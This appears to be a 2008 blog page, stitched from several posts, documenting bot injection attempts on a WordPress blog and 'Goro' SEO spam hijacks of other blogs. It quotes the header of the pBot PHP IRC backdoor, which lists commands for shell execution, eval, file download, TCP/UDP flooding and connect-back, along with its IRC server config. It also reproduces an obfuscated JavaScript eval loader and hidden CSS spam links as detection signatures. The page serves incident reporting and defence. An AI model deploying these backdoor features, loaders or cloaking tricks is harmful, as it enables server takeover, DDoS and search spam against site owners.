Today’s we just upgrade from WordPress 2.3.2 to 2.3.3 security release. There is 21 attack (script injections) on blog.kakkoi.net from 3 known bot-herder scripts ↓. The first attacker is from 212.24.62.200 → udkado.ru masking their useragent as Googlebot (a real human?). The were playing with my 302.curie redirect page at blog.kakkoi.net/uri/. I send the attacker data to abuse network and IronPort.

The next few hours we received 20 attack from the same bot-herder. They probably has a large scale of DDNS (china → korea → us ). Noticeably the scans pattern is predictable. From our Feb 5th attack all these botnet is targeting certain search keywords security, injection so we setup a honey-pot right on that particular URL.

Hacking Attempts on Kakkoi

Sort by Injection type.

The Bot-herder Host

Part of class pBot source taken from http://basiclifesaving.org/mycomments/rom.txt

<? 

/*
 *
 * #crew@corp. since 2003
 * edited by: devil__ <admin@xdevil.org>
 *
 * COMMANDS:
 *
 * .user <password> //login to the bot
 * .logout //logout of the bot
 * .die //kill the bot
 * .restart //restart the bot
 * .mail <to> <from> <subject> <msg> //send an email
 * .dns <IP|HOST> //dns lookup
 * .download <URL> <filename> //download a file
 * .exec <cmd> // uses exec() //execute a command
 * .sexec <cmd> // uses shell_exec() //execute a command
 * .cmd <cmd> // uses popen() //execute a command
 * .info //get system information
 * .php <php code> // uses eval() //execute php code
 * .tcpflood <target> <packets> <packetsize> <port> <delay> //tcpflood attack
 * .udpflood <target> <packets> <packetsize> <delay> //udpflood attack
 * .raw <cmd> //raw IRC command
 * .rndnick //change nickname
 * .pscan <host> <port> //port scan
 * .safe // test safe_mode (dvl)
 * .inbox <to> // test inbox (dvl)
 * .conback <ip> <port> // conect back (dvl)
 * .uname // return shell's uname using a php function (dvl)
 *
 */

set_time_limit(0);
error_reporting(0);
echo "Ok unlocker. We did i!";

class pBot
{
 var $config = array("server"=>"Bucharest.ro.eu.ultra-chat.org",
 "port"=>"6667",
 "pass"=>"n",
 "prefix"=>"[R]",
 "maxrand"=>"4",
 "chan"=>"#unlocker",
 "chan2"=>"#unlocker",
 "key"=>"n",
 "modes"=>"+p",
 "password"=>"n",
 "trigger"=>".",
 "hostauth"=>"Robert.users.ultra-chat.org" // * for any hostname (remember: /setvhost xdevil.org)
 );

Related Posts

• Daily Hacking Attempts on blog.kakkoi.net - Feb 5th, 2008
• Mass Remote Code Injection as Googlebot - Packet Spoofing Perl bot & Trojan

External Links

• Wikipedia → Botnet
• Storm Botnet
• Dynamic DNS

I received lots of multiple botnet injection (e.g: code & sql) on my wordpress blog. All the failed attempts from these Botnet (Bot-herder) will be published in this post. Somebody might find the informations useful ↓.

Failed Hacking Attempts

Sort by Injection type.

Related Posts

• Mass Remote Code Injection as Googlebot - Packet Spoofing Perl bot & Trojan

External Links

• Wikipedia → Botnet
• Storm Botnet

Being Hacked by SEO spammer is seem like a yearly events at Mattheaton.com. Matt’s WordPress blog was first hijacked 2 months ago on 26 November 2007 (according to my record). You can digg my earlier post at → Matt Heaton BlueHost HostMonster CEO Official Blog Hacked.

It’s a big embarrassment for bluehost & hostmonster hosting to have their CEO’s blog being spamride every year (since 2007) . Drilling Matt Heaton’s with bad ads wont solves the Blackhat Spam issues, I will left that particulars part to my readers to speculate.

Mattheaton Goro Spam Chronology

Wordpress.net.in GORO Spam Pattern

• All the infected sites will stop being index by archive.org few months before the spam started.
• From Nov 2007 to Jan 2008 (Right after Google Mass P3 De-rank fever) - The Blackhat Goro Spammer is targeting PR6 & PR7 sites running on WordPress (2.3.1 below) and on some rare case (tangonoticias.com) Joomla CMS (1.0.x)
• I categorize this blackhat method as Sybil Attack
  

  A Sybil attack is one in which an attacker subverts the reputation system by creating a large number of pseudonymous entities, and using them to gain a disproportionately large influence. A reputation system’s vulnerability to a Sybil attack depends on how cheaply Sybils can be generated, the degree to which the reputation system accepts input from entities that do not have a chain of trust linking them to a trusted entity, and whether the reputation system treats all entities identically.

  - Derank and manipulate their victim host to boost their pharmaceutical products on Google Local Search Index (gaming Localrank for better SERP)

• Goro signatures:
  1. html div with id “goro”

     <div id="goro"> <a href=">...</a> </div>
     

  2. javascript function name “getme()”

     <script type="text/javascript">function getme(str){ var idx = str.indexOf('?'); if (idx == -1) return str; var len = str.length; var new_str = ''; var i = 1; for (++idx; idx < len; idx += 2,i++){ var ch = parseInt(str.substr(idx, 2), 16); new_str += String.fromCharCode((ch + i) % 256); } eval(new_str); }getme('http://pagead2.googlesyndication.com/pagead/show_ads.js?636D6071685F676C255D5A68385E565D545C612E64334D100E4D545652090A0E5252564840083D414A4641354C0FF83E3E3C32F306'); </script>
     

  3. Output spam on WordPress wp_footer & wp_head hook

Blackhat SEO Spamdexing Google Local Search Index

The below graph explain the Blackhat SEO Spamdexing methods for Manipulating Google Local SERP.

View Spamdexing Google Local Search Image

Note: A blackhat at hoqwarts ;)

ScreenGrab

• mattheaton.com Jan 28 2008 (1009 x 6576 pixels)
• brainwave-india.com Jan 28 2008 (1016 x 2306 pixels)
• Google Local Search Jan 28 2008 Spamdexing Results
• stc-israel.org.il Jan 28 2008 spamdexing page (hidden text)
• stc-israel.org.il Jan 28 2008 spamdexing page (text reveal)

Recent Update

• Feb 1, 2008 - we send a letter to matt@bluehost.com regarding this issue. Still waiting for his replies
• Feb 3, 2008 - The Blackhat Goro Spammer change their target spamhost from http://www.brainwave-india.com (PR6) to http://www.thinkingphp.org (PR6) - Felix Geisendörfer.

  <div id="goro"><a href="http://www.thinkingphp.org/?read=796 ... prescription</a></div><script type="text/javascript">function getme(str){ var idx = str.indexOf('?'); if (idx == -1) return str; var len = str.length; var new_str = ''; var i = 1; for (++idx; idx < len; idx += 2,i++){ var ch = parseInt(str.substr(idx, 2), 16); new_str += String.fromCharCode((ch + i) % 256); } eval(new_str); }getme('http://pagead2.googlesyndication.com/pagead/show_ads.js?636D6071685F676C255D5A68385E565D545C612E64334D100E4D545652090A0E5252564840083D414A4641354C0FF83E3E3C32F306'); </script>

  thinkingphp.org blog is running on WordPress 2.3.2. We send him email regarding the Goro Spam hijack.

• Feb 8th 2008, There is no signature of Goro spam (tag with id goro) on Matt’s blog the blackhat is now using Inline CSS Position Overflow to hide the spams links ↓ redirect to zoorender.com (PR6).

  <div style="left: -2227px; position: absolute; top: -3337px"><a href="http://www.zoorender.com/?discount=1776">buying .. </div>
  

• Feb 13th 2008, Same methods as above (inline css cloacking) .
  • HTML Code shown to a Regular Browser → 32,246 characters
  • HTML Code shown to Google Bot → 34,646 characters

  redirect to blog.jensfranke.com (PR7).

  <div style="left: -2227px; position: absolute; top: -3337px"><a href="http://blog.jensfranke.com/?read=606">buy generic fi
  

• Feb 20th 2008, CSS Cloacking redirect to http://www.entrepreneur27.org/ (PR6).

  <div style="left: -2227px; position: absolute; top: -3337px"><a href="http://www.entrepreneur27.org/?more=1591">bad side effects of viagra</a>&nbsp;<a href="http://www.entrepreneur27.org/?more=1592"> ...
  </div>
  

• Feb 24th 2008, CSS Cloacking redirect to http://www.latenightpc.com (PR5). mattheaton-com-022408-source.txt
• Feb 26th 2008, CSS Cloacking redirect to http://www.communitynext.com/ WordPress 2.3.3 (PR6). mattheaton-com-022608-source.txt

Related Posts

• How to Removed wordpress.net.in Spam Injection
• Matt Heaton BlueHost HostMonster CEO Official Blog Hacked

External Links

• Bluehost & Hostmonster CEO’s Blog
• National Vulnerabilities Database (NVD) on Wordpress 2.0 > 2.0.5 vulnerabilities
• Wikipedia → Spamdexing
• pseudo-flaw - more random wordpress blogs owned by seo spammers